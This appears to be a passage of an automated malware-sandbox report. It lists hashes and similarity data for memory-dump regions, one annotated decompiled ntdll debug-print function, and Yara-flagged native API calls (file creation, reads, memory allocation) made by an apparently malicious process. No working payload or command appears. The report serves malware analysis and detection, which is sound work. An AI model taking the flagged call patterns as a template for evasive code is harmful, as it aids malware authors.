                                                                        • Opcode Fuzzy Hash: 533862cca9585a24181fa9b0be052c9c4ad18b8153eb62aa641dee1532fbfa85
                                                                        • Instruction Fuzzy Hash: 06B092B29024D9CAEB11E7B05A08B2B7E00BBE0741F26C562E2020685B4779C4D1F6F6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7f57d8ec620b5477713a7041f4138c1f89f7de3b5949056ddd3d970e0af6c7e0
                                                                        • Instruction ID: a8cf857df87f6bd03865a0eb8afb916004f5972a04dd5b3f14e8d12fa6ce18cf
                                                                        • Opcode Fuzzy Hash: 7f57d8ec620b5477713a7041f4138c1f89f7de3b5949056ddd3d970e0af6c7e0
                                                                        • Instruction Fuzzy Hash: 4F90026130101402D202616944146460409D7D1385F91C422E1414555D86658993F1B2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a95b55083c9078d4c0148a203ff530e1d0fd8da1bf08b7b1e37988ad21b478e8
                                                                        • Instruction ID: 0b268831c4c1ab52680674bb3939a4bb22d2de30e32814bef46280208555ae7a
                                                                        • Opcode Fuzzy Hash: a95b55083c9078d4c0148a203ff530e1d0fd8da1bf08b7b1e37988ad21b478e8
                                                                        • Instruction Fuzzy Hash: C890027124101402D241716944046460409A7D0381F91C422A0414554E86958A96FAE1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: acf0c5ca6763ce112214fdba1750dead8e58c65212ac86bb2dd03a9595d1ad0d
                                                                        • Instruction ID: acf0d5f479c79240ac9ac3f0f0c07aefe48256605cffbc211af4fdd1922508f2
                                                                        • Opcode Fuzzy Hash: acf0c5ca6763ce112214fdba1750dead8e58c65212ac86bb2dd03a9595d1ad0d
                                                                        • Instruction Fuzzy Hash: 119002A1601150434640B16948044465415A7E1341391C531A0444560C86A88895E2E5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3e3134b4b9b74d5b5f2d45300f61748f4729402a362236be3a1df73dcaafaede
                                                                        • Instruction ID: a40fc812ad20c0d0bfccf7cd46ae6051b02e7a62ad9cbeb0bb490aa243aa8551
                                                                        • Opcode Fuzzy Hash: 3e3134b4b9b74d5b5f2d45300f61748f4729402a362236be3a1df73dcaafaede
                                                                        • Instruction Fuzzy Hash: 9C9002A121101042D20461694404746044597E1341F51C422A2144554CC5698CA1A1A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0ec523b322f154841782fe45702d7bb620cdbbf48eac7ed7b0442deeea57f1d9
                                                                        • Instruction ID: 9d87ebb25f7e16c674cf0bdcc66ad79c6c983cba86160841acaefd05b65c1d6a
                                                                        • Opcode Fuzzy Hash: 0ec523b322f154841782fe45702d7bb620cdbbf48eac7ed7b0442deeea57f1d9
                                                                        • Instruction Fuzzy Hash: 329002A120141403D24065694804647040597D0342F51C421A2054555E8A698C91B1B5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8c1a2e58d0a9ee9d905b37cec31034e9a00ab54e61687ecd0b08b9711e7ad384
                                                                        • Instruction ID: f4c5860114ddf17f9db68ecdf7c04f689360a1830384660e23aad6d85af66e4b
                                                                        • Opcode Fuzzy Hash: 8c1a2e58d0a9ee9d905b37cec31034e9a00ab54e61687ecd0b08b9711e7ad384
                                                                        • Instruction Fuzzy Hash: 1F90026120145442D24062694804B4F450597E1342F91C429A4146554CC9558895A7A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5b50242622c097c1ee3ab1105051543370df660245f824523dd5cfe0eca8c0e2
                                                                        • Instruction ID: f212c6223a443c7e31d175cbe2b1ac146a28fab09b18ce3e74788c09f461f788
                                                                        • Opcode Fuzzy Hash: 5b50242622c097c1ee3ab1105051543370df660245f824523dd5cfe0eca8c0e2
                                                                        • Instruction Fuzzy Hash: 4590027120141402D20061694808787040597D0342F51C421A5154555E86A5C8D1B5B1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7e7bf762dbf6bb3b163a6c58d365a8d85a166491c1605bf008595114bc300184
                                                                        • Instruction ID: 35a2c4a2356be97c713b9b11c77802ac3579c4f72cf500f85071e0fb5cbe680b
                                                                        • Opcode Fuzzy Hash: 7e7bf762dbf6bb3b163a6c58d365a8d85a166491c1605bf008595114bc300184
                                                                        • Instruction Fuzzy Hash: 1990027120145002D2407169844464B5405A7E0341F51C821E0415554C86558896E2A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 03e685d4f64a78ebac497f8df8d3f8371ac3c3f2269777c46a2b0d514afb49dd
                                                                        • Instruction ID: d2fedbcecf7a950f5374f74c095b12ae17afb836810d99b7043c15328ee36e23
                                                                        • Opcode Fuzzy Hash: 03e685d4f64a78ebac497f8df8d3f8371ac3c3f2269777c46a2b0d514afb49dd
                                                                        • Instruction Fuzzy Hash: FB90026124101802D240716984147470406D7D0741F51C421A0014554D865689A5B6F1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b4956eb517797e7b37e7b1b20ff41f7d8bd09807949bcc0b2932efbd293f6a32
                                                                        • Instruction ID: e887574115e6291994776ade48fdfe3a4aa9aeef2f1fd83914d63565fb87ff4c
                                                                        • Opcode Fuzzy Hash: b4956eb517797e7b37e7b1b20ff41f7d8bd09807949bcc0b2932efbd293f6a32
                                                                        • Instruction Fuzzy Hash: 3890027120101802D204616948046C6040597D0341F51C421A6014655E96A588D1B1B1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ea96a56835bab26a5bfc4a94e5156efaaf478f9867840fdc7a2bb988912b01a7
                                                                        • Instruction ID: aa12941b71ce22c5ec157d25e5727ab8101b1e66847fe9b6ce386c495632ef30
                                                                        • Opcode Fuzzy Hash: ea96a56835bab26a5bfc4a94e5156efaaf478f9867840fdc7a2bb988912b01a7
                                                                        • Instruction Fuzzy Hash: 049002E1201150924600A2698404B4A490597E0341B51C426E1044560CC5658891E1B5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1a0f46c947ca884abbed91b2648bb9bcaf625a9307eddeb20f9a6d7f82546646
                                                                        • Instruction ID: dcf145d2a0992ac5f6972e22c51be163b7bb9ad120272f0053a6651c5f78a39a
                                                                        • Opcode Fuzzy Hash: 1a0f46c947ca884abbed91b2648bb9bcaf625a9307eddeb20f9a6d7f82546646
                                                                        • Instruction Fuzzy Hash: 3D900271A05010129240716948146864406A7E0781B55C421A0504554C89948A95A3E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 84066b475a91b52b7025c75f9435e0c66b426e826bf3938201d65c25b428ee5e
                                                                        • Instruction ID: 65897f1f7df915f69680ae797b9bea826366557d757b4b143bfcaf83edec5a20
                                                                        • Opcode Fuzzy Hash: 84066b475a91b52b7025c75f9435e0c66b426e826bf3938201d65c25b428ee5e
                                                                        • Instruction Fuzzy Hash: C4900265221010020245A569060454B0845A7D6391391C425F1406590CC66188A5A3A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c3b0371c301dd4de59500bc95b1eceb90fb157d36aca943668aaa6054f124641
                                                                        • Instruction ID: a6de25885d4ddb5bc7472cdb7a1e82fd784322be88a4c22f1469f4e8246c785f
                                                                        • Opcode Fuzzy Hash: c3b0371c301dd4de59500bc95b1eceb90fb157d36aca943668aaa6054f124641
                                                                        • Instruction Fuzzy Hash: CB90027120101842D20061694404B86040597E0341F51C426A0114654D8655C891B5A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3db51edff0a426eb572a72eee843e25e32d9e7047f7ae0e505699f2cde9f589b
                                                                        • Instruction ID: 3aae62aa8c56198208e2baf391671b09e3792a5d2cc022712fd769eeda9bed22
                                                                        • Opcode Fuzzy Hash: 3db51edff0a426eb572a72eee843e25e32d9e7047f7ae0e505699f2cde9f589b
                                                                        • Instruction Fuzzy Hash: 4690027160501802D25071694414786040597D0341F51C421A0014654D87958A95B6E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 61f0576ba1d3d40dd7f958760d47ad23e1dfa15580bc878c2f5c3af72e6e33f5
                                                                        • Instruction ID: ac43491b3d4451088206f3c0df52bd3e76dbb0b46fbd301310f6a850597c6de2
                                                                        • Opcode Fuzzy Hash: 61f0576ba1d3d40dd7f958760d47ad23e1dfa15580bc878c2f5c3af72e6e33f5
                                                                        • Instruction Fuzzy Hash: 7490027120505842D24071694404A86041597D0345F51C421A0054694D96658D95F6E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 73b93d0a0b49325c4191dee88f16edc116ab99f492bce43fc799c9e2cb672e1b
                                                                        • Instruction ID: 0447279c205caa384f4d89fc08c58219dd3feb71ae969dae4871b449b9b397d0
                                                                        • Opcode Fuzzy Hash: 73b93d0a0b49325c4191dee88f16edc116ab99f492bce43fc799c9e2cb672e1b
                                                                        • Instruction Fuzzy Hash: BA90026160501402D24071695418746041597D0341F51D421A0014554DC6998A95B6E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e1de816202fdbf0dc5c3b2dcab1d8b6082018183dfbbdb6fb3fc93bffa106b78
                                                                        • Instruction ID: 4f9cfaac5c4b9bc5f350f3032fa2162baaebd8ffb11511f72aef7ae4d89ae8fb
                                                                        • Opcode Fuzzy Hash: e1de816202fdbf0dc5c3b2dcab1d8b6082018183dfbbdb6fb3fc93bffa106b78
                                                                        • Instruction Fuzzy Hash: 05900271301010529600A6A95804A8A450597F0341B51D425A4004554C859488A1A1A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d9fee682c6e38763bde499e50fdd6fd6b4f227e1bf4f15c8c6a50b35e6c97bbf
                                                                        • Instruction ID: 6161ed1c96c8455890c1f4271aa2edab8ebf969a51aa5f7db855893b9f930ef0
                                                                        • Opcode Fuzzy Hash: d9fee682c6e38763bde499e50fdd6fd6b4f227e1bf4f15c8c6a50b35e6c97bbf
                                                                        • Instruction Fuzzy Hash: 0190027120101403D20061695508747040597D0341F51D821A0414558DD6968891B1A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3bab09fccece77ccaca4588e47b29f8956165bc96713490cabb5005bdc622e20
                                                                        • Instruction ID: a9771e8ba13c254f64fc4a33f4a49f6398ce908e05151f7d14d6a5d11b408f71
                                                                        • Opcode Fuzzy Hash: 3bab09fccece77ccaca4588e47b29f8956165bc96713490cabb5005bdc622e20
                                                                        • Instruction Fuzzy Hash: EA90026120505442D20065695408A46040597D0345F51D421A1054595DC6758891F1B1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 78ad3d5117f62963eec4683e698f0c0668aeb52faee5236d7444f1b2692a2421
                                                                        • Instruction ID: 5847bf32bf62a41ba9cdc3f47874bcb6937f8d28ab153e4a53c387a6bb3fdf9d
                                                                        • Opcode Fuzzy Hash: 78ad3d5117f62963eec4683e698f0c0668aeb52faee5236d7444f1b2692a2421
                                                                        • Instruction Fuzzy Hash: 6790027520505442D60065695804AC7040597D0345F51D821A041459CD869488A1F1A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                        • Instruction ID: e3402ee03f312e289058b1bfefd1d935daa076871646f2a9186fa30f0aef9e36
                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                        • Instruction Fuzzy Hash:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 53%
                                                                        /* Decompiler output for the function at 0x00A5FDDA (quality 53%). Comments added for orientation;
                                                                           offsets are read against the public TEB / RTL_CRITICAL_SECTION layouts and the format strings below. */
                                                                        E00A5FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                            void* _t7;
                                                                            intOrPtr _t9;
                                                                            intOrPtr _t10;
                                                                            intOrPtr* _t12;
                                                                            intOrPtr* _t13;
                                                                            intOrPtr _t14;
                                                                            intOrPtr* _t15;

                                                                            _t13 = __edx;                      // __edx points at a 64-bit timeout (low dword, high dword)
                                                                            _push(_a4);
                                                                            _t14 =  *[fs:0x18];                // TEB self-pointer (NT_TIB.Self) on 32-bit Windows
                                                                            _t15 = _t12;                       // _t12 is never assigned: a register argument the decompiler did not
                                                                                                               // recover; the uses below show it is the RTL_CRITICAL_SECTION pointer
                                                                            // Divisor 0xffffffff:ff676980 is -10,000,000, so this converts the 100 ns timeout to seconds;
                                                                            // the callee is presumably a 64-bit division helper (inferred from the "%I64u secs" format below)
                                                                            _t7 = E00A0CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                            _push(_t13);
                                                                            // Debug-print helper taking (id, level, format, ...)
                                                                            E00A55720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                            _t9 =  *_t15;                      // RTL_CRITICAL_SECTION.DebugInfo
                                                                            if(_t9 == 0xffffffff) {            // -1: no debug record allocated for this critical section
                                                                                _t10 = 0;
                                                                            } else {
                                                                                _t10 =  *((intOrPtr*)(_t9 + 0x14));   // RTL_CRITICAL_SECTION_DEBUG.ContentionCount
                                                                            }
                                                                            _push(_t10);
                                                                            _push(_t15);
                                                                            _push( *((intOrPtr*)(_t15 + 0xc)));     // RTL_CRITICAL_SECTION.OwningThread
                                                                            _push( *((intOrPtr*)(_t14 + 0x24)));    // TEB.ClientId.UniqueThread
                                                                            return E00A55720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));   // TEB.ClientId.UniqueProcess
                                                                        }

                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A5FDFA
                                                                        Strings
                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00A5FE01
                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00A5FE2B
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                        • API String ID: 885266447-3903918235
                                                                        • Opcode ID: 05f2b1fcdb6c4e0f3fb10e9f6ecfb3c497451875d7a5507d71965bc8a1d38da1
                                                                        • Instruction ID: 96e45386d4b3a81d1b37ac4873e997ea375468bc9e47f36266e5cb260fc2406d
                                                                        • Opcode Fuzzy Hash: 05f2b1fcdb6c4e0f3fb10e9f6ecfb3c497451875d7a5507d71965bc8a1d38da1
                                                                        • Instruction Fuzzy Hash: 8DF0F632600601BFDA201B55DD03F63BF6AEB84731F240314FA28565E1DA72F86096F0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Executed Functions

                                                                        APIs
                                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00713B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00713B87,007A002E,00000000,00000060,00000000,00000000), ref: 007181FD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID: .z`
                                                                        • API String ID: 823142352-1441809116
                                                                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                        • Instruction ID: 1fb66217961641b9517a34ae70a114bfefc7a234bfa0ebdbecd5b6ca9970c8ff
                                                                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                        • Instruction Fuzzy Hash: AFF0B6B2200208ABCB48CF88DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtClose.NTDLL( =q,?,?,00713D20,00000000,FFFFFFFF), ref: 00718305
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID: =q
                                                                        • API String ID: 3535843008-2330367718
                                                                        • Opcode ID: 78a2f41bd7a4a01db518a76d96445a5a9d3aacec5d623196880ddfda99e87ade
                                                                        • Instruction ID: 4bf7dd38bda55a9461bca49db0803eaaee27bcf164c574c19279a2d2afdd7e97
                                                                        • Opcode Fuzzy Hash: 78a2f41bd7a4a01db518a76d96445a5a9d3aacec5d623196880ddfda99e87ade
                                                                        • Instruction Fuzzy Hash: 41E0C236240314BBDB10EFD8CC89EDB3768EF48310F144054BE585B382CA30EA0087D0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtClose.NTDLL( =q,?,?,00713D20,00000000,FFFFFFFF), ref: 00718305
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID: =q
                                                                        • API String ID: 3535843008-2330367718
                                                                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                        • Instruction ID: 11640d6942ae41188c5f4c978ed5826d071d96eaea25ac064fa7e21dca9a32f0
                                                                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                        • Instruction Fuzzy Hash: 55D01275200314BBD710EF98DC45ED7775CEF48750F154455BA585B382C930FA0086E0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtReadFile.NTDLL(?,?,FFFFFFFF,00713A01,?,?,?,?,00713A01,FFFFFFFF,?,B=q,?,00000000), ref: 007182A5
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                        • Instruction ID: ee8f85d4df9f39ed9153f7a8aa2baff6f782add93add6a1397ccf70642729237
                                                                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                        • Instruction Fuzzy Hash: BEF0A4B2200208ABCB14DF89DC85EEB77ADAF8C754F158248BA1D97241DA30E9518BA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00702D11,00002000,00003000,00000004), ref: 007183C9
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                        • Instruction ID: e52a21f8ab7204c87dd8f60fedc4921cbd8f6d702e8a9f4e344a0417ea1ce4fc
                                                                        • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                        • Instruction Fuzzy Hash: A3F015B2200208ABCB14DF89DC81EEB77ADAF8C750F118148BE0897381CA30F910CBE0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.910535449.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true
                                                                        • Associated: 00000007.00000002.910657081.000000000488B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: ff4f1d3c3d32fc37067f8ee36b871c362838995b35a2a91b7946c078bf248bb3
                                                                        • Instruction ID: af45c50d43e65b2d2ce1b6ab843e45ba7c3b387a824eb56456371f8c2e6c990c
                                                                        • Opcode Fuzzy Hash: ff4f1d3c3d32fc37067f8ee36b871c362838995b35a2a91b7946c078bf248bb3
                                                                        • Instruction Fuzzy Hash: B7900265211001072115A55B0704527004697DD3D5351C131F500A561CD661D8657161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.910535449.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true
                                                                        • Associated: 00000007.00000002.910657081.000000000488B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 867166286dd09b0764312006a8c65692f5a226234462b1d461b955ff75c3e85d
                                                                        • Instruction ID: dae631ac1b9f6a28223511168cc76e5f67a0ebdda26c6fce31c010bfa725b4ee
                                                                        • Opcode Fuzzy Hash: 867166286dd09b0764312006a8c65692f5a226234462b1d461b955ff75c3e85d
                                                                        • Instruction Fuzzy Hash: 1D9002A1202001076115715B4414636400A97E8285B51C131E50095A1DC565D8957165
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.910535449.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true
                                                                        • Associated: 00000007.00000002.910657081.000000000488B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: e35e7eee1f724bd2dc968ef3ea25f89b3af2e594b7d6442a7ed957ba4af523d5
                                                                        • Instruction ID: 10195a9b5d54cf04b484ca811a62cf9e4dbf6d641554e0fe4aab3fad3fff6425
                                                                        • Opcode Fuzzy Hash: e35e7eee1f724bd2dc968ef3ea25f89b3af2e594b7d6442a7ed957ba4af523d5
                                                                        • Instruction Fuzzy Hash: 6E90027120100906F190715B440466A000597D9385F91C125A401A665DCA55DA5D77E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.910535449.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true
                                                                        • Associated: 00000007.00000002.910657081.000000000488B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: dffd56c2905f76c08cc2f561acd73202448ca12ef2abfa87beb148799e0ca554
                                                                        • Instruction ID: 17f453f1a4c9681325a2e1d90b557c656507a9418a8f759a9cf278df8541949a
                                                                        • Opcode Fuzzy Hash: dffd56c2905f76c08cc2f561acd73202448ca12ef2abfa87beb148799e0ca554
                                                                        • Instruction Fuzzy Hash: 8490027120504946F150715B4404A66001597D8389F51C121A40596A5D9665DD59B6A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
